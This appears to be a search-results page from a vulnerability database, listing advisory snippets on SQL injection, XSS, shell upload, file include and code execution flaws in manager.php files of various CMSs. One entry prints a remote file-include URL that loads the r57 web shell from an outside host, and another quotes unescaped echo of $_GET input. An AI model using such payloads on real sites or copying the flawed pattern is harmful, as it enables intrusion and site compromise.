12 matches found
PT-2025-19805 · Seacms · Seacms
Name of the Vulnerable Software and Affected Versions: SeaCMS version 13.3 Description: A SQL injection issue was discovered in the admin manager.php component. Recommendations: For SeaCMS version 13.3, update to a version that fixes the SQL injection vulnerability in the admin manager.php...
Information Disclosure
moodle/moodle is vulnerable to information disclosure. The vulnerability exists because the activity attempts report does not properly filter by groups in the getreport function of manager.php, allowing an attacker to reveal the information about attempts or users in groups to non-editing teacher...
Remote Code Execution (RCE)
laravel/laravel is vulnerable to remote code execution. The vulnerability exists in destruct in PendingResourceRegistration.php, Manager.php, and ClosureWrapper.php, which allows an attacker to inject malicious code via an unserialize pop chain...
SEOPanel 4.6.0 Cross Site Scripting
Hello, We are informing you about Cross-Site Scripting Vulnerabilities in SEOPanel 4.6.0. Information: Advisory by Netsparker. Name: Cross-Site Scripting Vulnerabilities in SEOPanel. Affected Software: SEOPanel. Affected Versions: 4.6.0. Vendor Homepage: https://www.seopanel.org/...
WordPress ProfileGrid Plugin <= 2.6.6 - Reflected Cross Site Scripting
A reflected cross-site scripting vulnerability was found in the ProfileGrid plugin, version 2.6.6. The vulnerability exists in the file /admin/partials/user-manager.php, where some of the $_GET parameters are not escaped. For example: if (isset($_GET['search'])) echo $_GET['search']; … Solution: Update the plugin...
Serendipity 1.5.4 0day Arbitrary File Upload Vulnerability
No description provided by source. In The Name Of GOD + Exploit Title:remote 0day file upload + Date: 2010 + script:Serendipity 1.5.4 + Software Link: http://www.s9y.org/12.html + Author : pentesters.ir +discovered by:ahmadbady + Contact : [email protected] + Website : WwW.PenTesters.IR +...
Serendipity 1.5.4 Shell Upload
In The Name Of GOD + Exploit Title:remote 0day file upload + Date: 2010 + script:Serendipity 1.5.4 + Software Link: http://www.s9y.org/12.html + Author : pentesters.ir +discovered by:ahmadbady + Contact : [email protected] + Website : WwW.PenTesters.IR + Greeting: Behzad, navid,...
Wordpress Image Manager Plugins Shell Upload Vulnerability
Exploit for unknown platform in category web applications. Wordpress Image Manager Plugins Shell Upload Vulnerability. Exploit Title: Wordpress Image Manager Plugins Shell Upload...
CVE-2009-1913
CVE-2009-1913 affects LuxBum 0.5.5. The vulnerability is a SQL injection in the login flow, specifically in manager.php, triggered when magic_quotes_gpc is disabled and dotclear authentication is used. An attacker can remotely execute arbitrary SQL commands by supplying a crafted username value i...
Multiple file include exploits in Xtreme Downloads v.1.0
Multiple file include exploits in Xtreme Downloads v.1.0 script type : Xtreme Downloads v.1.0 bug found by : sweet-devil & black-code team : site-down type : file include exploits : download.php http://www.example.com/path/download.php?root=http://yoursite/r57shell.txt? manager.php...
Design/Logic Flaw
Laurentiu Matei eXpandable Home Page (XHP) CMS 0.5 and earlier allows remote authenticated users to use the HTMLArea FileManager plugin to upload and execute arbitrary PHP files using (1) manager.php, (2) standalonemanager.php, and (3) images.php...
CVE-2006-1371
Laurentiu Matei eXpandable Home Page (XHP) CMS 0.5 and earlier allows remote authenticated users to use the HTMLArea FileManager plugin to upload and execute arbitrary PHP files using (1) manager.php, (2) standalonemanager.php, and (3) images.php...